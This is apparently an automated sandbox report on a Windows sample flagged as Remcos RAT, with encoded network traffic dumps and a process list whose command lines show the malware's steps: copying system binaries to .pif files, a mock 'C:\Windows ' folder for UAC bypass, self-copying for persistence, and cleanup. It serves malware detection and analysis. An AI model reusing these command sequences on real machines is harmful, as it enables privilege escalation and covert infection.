                                                                    Data Ascii: Sy5SNQo66CRNIgQ/Pzo9L5spbyw/LHczXyEgMBMhEzo0M9YjGqyhkUKulKSSKXrxgDBfPVMrUCxBJNc98CeWIcMyjSUFJfcykS7ePDkuoz15IzQltJerqyiVr6mfnK4xYygGNOQyny1VIV8tEzECJB87FC4WOwguGiELOksz9jTdOmIrs62pqjyZn4qerp8uQyf6LkY69SzeIeMn5TjSJpA08DfXI9Ul5SuyKMYoxvG4PVgn+C5LPP8o/isyNSQ
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 55 38 48 53 59 54 49 78 6f 78 42 53 4d 41 49 2f 59 2b 53 43 50 6b 4d 76 44 78 36 6a 4c 74 4c 4e 63 71 77 53 6a 44 4e 4c 77 71 52 69 62 37 4a 55 77 78 4f 79 67 6f 4d 6a 63 30 4d 43 6f 69 4a 72 45 71 74 6a 62 4c 49 36 59 38 72 43 6d 63 50 5a 55 6f 71 69 65 48 50 45 38 32 55 44 47 31 4d 34 49 6b 55 6a 46 59 4e 46 55 6c 61 54 51 50 4d 45 73 6b 33 79 33 63 4a 4f 49 77 53 53 59 74 4b 7a 6f 74 4a 6a 57 55 4b 76 59 34 52 6a 76 68 4c 39 63 6f 66 69 61 42 4a 54 59 6c 4d 43 4b 50 50 6f 4d 6b 53 43 33 6f 50 2b 67 72 36 79 69 6f 4e 33 34 30 73 6a 51 76 4c 6a 55 35 75 54 79 67 50 49 6f 6a 58 6a 5a 55 4f 6d 73 2b 47 53 32 5a 50 6e 67 72 68 44 68 6a 4e 57 77 70 48 43 7a 50 4c 66 49 31 78 54 75 67 50 35 6b 71 69 7a 74 6d 4d 47 6b 71 47 44 7a 62 4c 75 59 37 31 79 56 42 50
                                                                    Data Ascii: U8HSYTIxoxBSMAI/Y+SCPkMvDx6jLtLNcqwSjDNLwqRib7JUwxOygoMjc0MCoiJrEqtjbLI6Y8rCmcPZUoqieHPE82UDG1M4IkUjFYNFUlaTQPMEsk3y3cJOIwSSYtKzotJjWUKvY4RjvhL9cofiaBJTYlMCKPPoMkSC3oP+gr6yioN340sjQvLjU5uTygPIojXjZUOms+GS2ZPngrhDhjNWwpHCzPLfI1xTugP5kqiztmMGkqGDzbLuY71yVBP
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 4e 31 55 69 44 53 70 37 4d 57 73 34 48 44 38 48 50 4e 38 72 35 44 37 4f 4f 30 34 71 78 6a 76 4e 50 71 55 71 65 79 4e 6f 4b 6d 55 2b 47 43 68 4f 4a 63 51 6a 54 54 77 74 49 53 30 7a 6e 7a 43 71 4a 34 34 68 66 79 39 57 4c 46 51 73 48 79 51 61 4f 45 55 69 31 53 76 6b 4f 65 45 74 2b 53 34 31 4d 43 30 7a 4e 6a 4f 38 4b 5a 49 2f 6d 54 6c 79 4f 57 49 6d 55 6a 4e 69 50 77 77 37 39 79 68 46 4f 74 30 76 34 54 77 78 4d 53 49 74 73 79 69 75 6d 5a 57 68 71 61 2b 58 37 36 6d 5a 6e 6a 65 62 50 48 51 6d 64 6a 42 58 49 6e 41 33 48 43 6b 63 4d 76 38 39 36 43 7a 6c 4b 39 30 33 41 7a 4a 50 4a 2b 41 68 51 69 50 6b 49 75 55 39 36 69 2f 43 50 72 51 76 73 7a 51 41 50 6b 55 76 39 6a 5a 43 4c 54 30 32 57 71 53 53 6d 41 43 66 6e 39 36 64 6f 35 55 6a 4d 43 54 47 4b 2b 47 6a 71 70 6e
                                                                    Data Ascii: N1UiDSp7MWs4HD8HPN8r5D7OO04qxjvNPqUqeyNoKmU+GChOJcQjTTwtIS0znzCqJ44hfy9WLFQsHyQaOEUi1SvkOeEt+S41MC0zNjO8KZI/mTlyOWImUjNiPww79yhFOt0v4TwxMSItsyiumZWhqa+X76mZnjebPHQmdjBXInA3HCkcMv896CzlK903AzJPJ+AhQiPkIuU96i/CPrQvszQAPkUv9jZCLT02WqSSmACfn96do5UjMCTGK+Gjqpn
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 75 6e 4e 33 63 74 56 69 52 71 4e 6c 6b 69 43 43 45 48 50 30 49 38 53 6a 7a 65 4a 72 49 78 77 44 65 61 4e 4a 67 72 6f 6a 36 4d 4d 6f 38 32 66 43 56 77 4e 39 59 69 32 6a 45 79 50 44 6a 78 73 69 53 48 4a 58 49 39 6a 54 4e 65 4d 46 34 6c 53 6a 54 75 50 2b 6f 6c 30 6a 50 38 49 63 51 30 74 43 71 71 4e 6f 4d 35 6a 53 69 4e 4c 32 73 79 57 54 64 4c 49 65 4d 6e 32 43 53 33 4a 66 73 36 78 69 69 35 4f 5a 51 70 72 44 4a 33 4f 46 6b 70 54 54 41 74 4b 46 34 31 5a 6a 74 4d 4c 39 49 6d 34 6a 62 4e 4f 35 41 74 48 53 70 45 49 76 59 37 53 43 36 69 4b 36 34 35 55 69 73 42 4b 30 34 33 69 53 70 41 4f 48 6f 71 36 54 67 30 4a 35 41 68 62 43 50 7a 50 79 63 6d 38 69 6f 31 4b 4b 41 38 59 53 56 71 50 78 59 35 49 43 63 2b 4b 48 4d 6b 64 54 68 57 4c 51 4d 79 7a 79 66 32 4d 6b 77 6e 4c
                                                                    Data Ascii: unN3ctViRqNlkiCCEHP0I8SjzeJrIxwDeaNJgroj6MMo82fCVwN9Yi2jEyPDjxsiSHJXI9jTNeMF4lSjTuP+ol0jP8IcQ0tCqqNoM5jSiNL2syWTdLIeMn2CS3Jfs6xii5OZQprDJ3OFkpTTAtKF41ZjtML9Im4jbNO5AtHSpEIvY7SC6iK645UisBK043iSpAOHoq6Tg0J5AhbCPzPycm8io1KKA8YSVqPxY5ICc+KHMkdThWLQMyzyf2MkwnL
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 74 54 72 45 4d 6e 45 6f 66 54 34 63 4c 42 6f 35 33 69 66 55 50 4f 41 7a 52 53 49 37 4a 48 51 35 45 6a 78 49 6e 4b 71 65 67 70 2b 62 37 5a 47 68 6d 69 78 34 50 51 30 74 58 7a 58 76 50 38 45 75 4d 6a 62 61 4b 6d 63 33 61 54 6c 6d 4c 64 4d 6b 38 7a 54 4a 4f 59 38 76 55 79 68 68 38 51 34 35 44 53 4e 49 4a 74 38 30 32 53 62 52 4a 73 59 37 39 53 59 77 4f 6c 30 71 4d 7a 67 78 4a 72 6a 78 71 43 4e 2b 50 77 49 68 2f 53 33 6d 4c 74 34 36 53 69 4d 73 4f 54 30 2f 78 79 61 64 4b 6f 59 6d 66 54 6f 4d 4c 77 63 77 37 69 58 77 4d 4d 63 6c 41 43 6f 36 4d 49 49 35 44 7a 37 37 50 65 41 71 49 54 38 76 4f 72 38 72 6b 7a 6c 7a 50 59 51 70 56 66 48 6c 4b 66 38 39 53 79 76 35 4a 69 66 78 4b 7a 38 79 49 72 63 77 6d 6a 4b 4a 4a 6c 33 78 54 43 35 4e 6e 61 2b 64 45 4a 57 59 7a 4a 53
                                                                    Data Ascii: tTrEMnEofT4cLBo53ifUPOAzRSI7JHQ5EjxInKqegp+b7ZGhmix4PQ0tXzXvP8EuMjbaKmc3aTlmLdMk8zTJOY8vUyhh8Q45DSNIJt802SbRJsY79SYwOl0qMzgxJrjxqCN+PwIh/S3mLt46SiMsOT0/xyadKoYmfToMLwcw7iXwMMclACo6MII5Dz77PeAqIT8vOr8rkzlzPYQpVfHlKf89Syv5JifxKz8yIrcwmjKJJl3xTC5Nna+dEJWYzJS
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 30 73 41 7a 77 65 4d 45 6b 6d 38 43 48 6d 4b 54 4d 77 70 79 71 57 4c 6e 49 38 66 69 35 71 4c 6d 63 7a 62 79 34 55 50 78 30 74 41 7a 39 4c 49 66 49 6e 36 79 58 61 4f 54 63 6e 72 79 69 6c 4b 34 6f 2f 5a 69 5a 75 50 42 73 36 53 79 54 5a 4b 44 41 6b 38 54 6a 4e 4c 49 38 7a 68 43 62 65 4d 7a 55 6d 4e 69 6b 70 4d 73 63 37 70 71 36 6b 72 77 79 61 6c 70 32 70 4e 35 6b 6d 55 54 64 61 4d 77 34 6e 47 43 37 77 4a 39 77 7a 79 69 53 6c 4b 59 49 76 62 6a 42 54 4c 56 34 2f 42 54 77 4f 4b 4d 38 75 74 66 48 32 49 38 44 78 62 43 68 75 4e 41 6b 75 54 69 64 44 4e 54 34 68 6b 79 4f 4e 50 51 30 2b 46 54 37 65 4a 4f 34 7a 51 6a 55 79 4e 53 55 71 77 6a 2b 61 4e 4c 41 77 66 43 4e 66 4d 51 67 6b 46 7a 63 47 4f 68 63 6d 38 79 50 74 49 72 67 36 39 44 54 32 4e 37 59 6a 6e 54 4b 58 4f
                                                                    Data Ascii: 0sAzweMEkm8CHmKTMwpyqWLnI8fi5qLmczby4UPx0tAz9LIfIn6yXaOTcnryilK4o/ZiZuPBs6SyTZKDAk8TjNLI8zhCbeMzUmNikpMsc7pq6krwyalp2pN5kmUTdaMw4nGC7wJ9wzyiSlKYIvbjBTLV4/BTwOKM8utfH2I8DxbChuNAkuTidDNT4hkyONPQ0+FT7eJO4zQjUyNSUqwj+aNLAwfCNfMQgkFzcGOhcm8yPtIrg69DT2N7YjnTKXO

                                                                    Target ID:0
                                                                    Start time:02:12:11
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\nft438A5fN.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'244'672 bytes
                                                                    MD5 hash:1A4D920B70293F85958A9A2CDE581F6F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:02:12:22
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "
                                                                    Imagebase:0xa40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:02:12:22
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6ee680000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:02:12:23
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                    Imagebase:0xb80000
                                                                    File size:352'768 bytes
                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:02:12:23
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                    Imagebase:0xb80000
                                                                    File size:352'768 bytes
                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:02:12:23
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 0%, Virustotal
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:02:12:24
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o
                                                                    Imagebase:0xb80000
                                                                    File size:352'768 bytes
                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:02:12:24
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6ee680000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:02:12:24
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:02:12:24
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\colorcpl.exe
                                                                    Imagebase:0xe60000
                                                                    File size:86'528 bytes
                                                                    MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:02:12:25
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:02:12:26
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:02:12:26
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\xpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                    Imagebase:0xf0000
                                                                    File size:18'944 bytes
                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 0%, Virustotal
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:02:12:34
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\Libraries\Wuqtggvo.PIF
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\Public\Libraries\Wuqtggvo.PIF"
                                                                    Imagebase:0x400000
                                                                    File size:1'244'672 bytes
                                                                    MD5 hash:1A4D920B70293F85958A9A2CDE581F6F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:Borland Delphi
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 58%, ReversingLabs
                                                                    • Detection: 68%, Virustotal
                                                                    Has exited:true

                                                                    Target ID:21
                                                                    Start time:02:12:35
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\colorcpl.exe
                                                                    Imagebase:0xe60000
                                                                    File size:86'528 bytes
                                                                    MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:02:12:36
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 668
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:24
                                                                    Start time:02:12:37
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:02:12:39
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:27
                                                                    Start time:02:12:39
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:02:12:40
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:30
                                                                    Start time:02:12:42
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 676
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:31
                                                                    Start time:02:12:42
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\Libraries\Wuqtggvo.PIF
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\Public\Libraries\Wuqtggvo.PIF"
                                                                    Imagebase:0x400000
                                                                    File size:1'244'672 bytes
                                                                    MD5 hash:1A4D920B70293F85958A9A2CDE581F6F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:Borland Delphi
                                                                    Has exited:true

                                                                    Target ID:33
                                                                    Start time:02:12:44
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\SndVol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\SndVol.exe
                                                                    Imagebase:0x360000
                                                                    File size:226'712 bytes
                                                                    MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Has exited:true

                                                                    Target ID:35
                                                                    Start time:02:12:45
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:37
                                                                    Start time:02:12:50
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 624
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true


                                                                      Execution Graph

                                                                      Execution Coverage:6.5%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:5.2%
                                                                      Total number of Nodes:1328
                                                                      Total number of Limit Nodes:18
